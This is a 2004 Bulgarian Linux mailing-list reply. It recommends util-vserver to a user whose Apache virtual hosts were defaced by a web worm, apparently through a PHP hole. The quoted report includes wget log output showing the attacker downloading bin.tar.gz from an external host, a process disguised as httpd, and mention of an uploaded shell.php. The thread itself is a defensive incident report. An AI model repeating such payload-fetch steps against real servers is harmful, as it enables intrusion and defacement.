Re: lug-bg: Apache + chroot + many vdomains

[Georgi Alexandrov <tehlists@xxxxxxxxxx>]

https://savannah.nongnu.org/projects/util-vserver/ 
<http://freshmeat.net/redir/util-vserver/51531/url_homepage/util-vserver>
"util-vserver is a Linux virtual server utility framework, allowing an 
administrator to set up multiple, isolated virtual servers. It can be 
used to run various services securely separated, without requiring 
special configuration. Virtual servers are unable to interact with each 
other, or the main server. "
Danail Petrov wrote:

> Здравейте,
> искам да попитам, има ли възможност да се пусне apache (или друг уеб 
> сървър)  във /fakeroot , като обаче целта е всички виртуални домейни
> да бъдат в отделен /fakeroot ?
> До сега ползвах станадртно apache с конфигурирани виртуални домейни, 
> но днес сутринта при отварянето на една от страниците която се
> хоства на въпросната машина видях това:
>
> This site is defaced!!!
> NeverEverNo Sanity WebWorm generation 18
>
> Това беше default index.html на всички уеб страници...... вярно че 
> машинката си беше занемарена малко , и от близо 1 година нищо не беше 
> пипано
> по нея , но...... сега ще трябва да се оправи тази каша.
> Ето какво намерих в лог файловете. Според мен са ползвали "дупка" в 
> някой .php (на машината има няколко сайта с 'eXoops'):
> --13:44:45--  http://dhaenk.port5.com/bin.tar.gz
>           => `bin.tar.gz'
> Resolving dhaenk.port5.com... done.
> Connecting to dhaenk.port5.com[212.15.85.21]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 1,153,967 [application/x-tar]
>
>    0K .......... .......... .......... .......... ..........  4%   
> 14.48 KB/s
>   50K .......... .......... .......... .......... ..........  8%   
> 12.15 KB/s
>  100K .......... .......... .......... .......... .......... 13%    
> 9.07 KB/s
>  150K .......... .......... .......... .......... .......... 17%   
> 11.07 KB/s
>  200K .......... .......... .......... .......... .......... 22%   
> 10.29 KB/s
>  250K .......... .......... .......... .......... .......... 26%   
> 14.41 KB/s
>  300K .......... .......... .......... .......... .......... 31%    
> 9.25 KB/s
>  350K .......... .......... .......... .......... .......... 35%    
> 7.07 KB/s
>  400K .......... .......... .......... .......... .......... 39%   
> 13.14 KB/s
>  450K .......... .......... .......... .......... .......... 44%   
> 10.39 KB/s
>  500K .......... .......... .......... .......... .......... 48%    
> 7.16 KB/s
>  550K .......... .......... .......... .......... .......... 53%   
> 10.24 KB/s
>  600K .......... .......... .......... .......... .......... 57%   
> 10.99 KB/s
>  650K .......... .......... .......... .......... .......... 62%   
> 12.40 KB/s
>  700K .......... .......... .......... .......... .......... 66%    
> 6.04 KB/s
>  750K .......... .......... .......... .......... .......... 70%   
> 16.13 KB/s
>  800K .......... .......... .......... .......... .......... 75%    
> 8.19 KB/s
>  850K .......... .......... .......... .......... .......... 79%    
> 8.18 KB/s
>  900K .......... .......... .......... .......... .......... 84%    
> 6.03 KB/s
>  950K .......... .......... .......... .......... .......... 88%   
> 11.16 KB/s
> 1000K .......... .......... .......... .......... .......... 93%   
> 27.44 KB/s
> 1050K .......... .......... .......... .......... .......... 97%   
> 16.55 KB/s
> 1100K .......... .......... ......                          100%    
> 8.34 KB/s
> 13:46:37 (10.07 KB/s) - `bin.tar.gz' saved [1153967/1153967]
>
> ==> Fakename: /usr/sbin/httpd PidNum: 12821
> [Tue Dec 21 20:01:50 2004] [notice] SIGHUP received.  Attempting to 
> restart
> [Tue Dec 21 20:01:59 2004] [notice] Digest: generating secret for 
> digest authentication ...
> [Tue Dec 21 20:01:59 2004] [notice] Digest: done
>
>
> [Tue Dec 21 20:11:39 2004] [notice] Apache/2.0.40 (Red Hat Linux) 
> configured -- resuming normal operations
> [Tue Dec 21 20:11:39 2004] [info] Server built: Feb 25 2003 05:01:56
> [Tue Dec 21 20:11:39 2004] [debug] 
> /usr/src/build/228504-i386/BUILD/httpd-2.0.40/server/mpm/prefork/prefork.c(1039): 
> AcceptMutex: sysvsem (default: sysvsem)
> String found where operator expected at m1ho2of line 2, near 
> "$ts[int(rand(@ts))] . '"
>  (Might be a runaway multi-line '' string starting on line 1)
>        (Missing semicolon on previous line?)
> syntax error at m1ho2of line 2, near "$ts[int(rand(@ts))] . '"
> Bad name after D' at m1ho2of line 2.
> String found where operator expected at m1ho2of line 2, near 
> "$ts[int(rand(@ts))] . '"
>  (Might be a runaway multi-line '' string starting on line 1)
>        (Missing semicolon on previous line?)
> syntax error at m1ho2of line 2, near "$ts[int(rand(@ts))] . '"
> Bad name after D' at m1ho2of line 2.
> String found where operator expected at m1ho2of line 2, near 
> "$ts[int(rand(@ts))] . '"
>  (Might be a runaway multi-line '' string starting on line 1)
>        (Missing semicolon on previous line?)
> syntax error at m1ho2of line 2, near "$ts[int(rand(@ts))] . '"
> Bad name after D' at m1ho2of line 2.
> [--cut--]
>
> на единия сайт дори бяха си ъплоаднали shell.php :) (сещате се какво 
> прави това ....)
> та ... все от някъде трябва да го захвана , въпроса е от къде...
>
>
> Ще се радвам да чуя вашите мниения по въпроса , както се надявам и на 
> съвети от ваша страна.
> Поздрави,
> Данаил Петров
>
>
>
>
>
>
> ============================================================================ 
>
> A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers).
> http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara 
> Zagora
> To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
> ============================================================================ 
============================================================================
A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers).
http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora
To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
============================================================================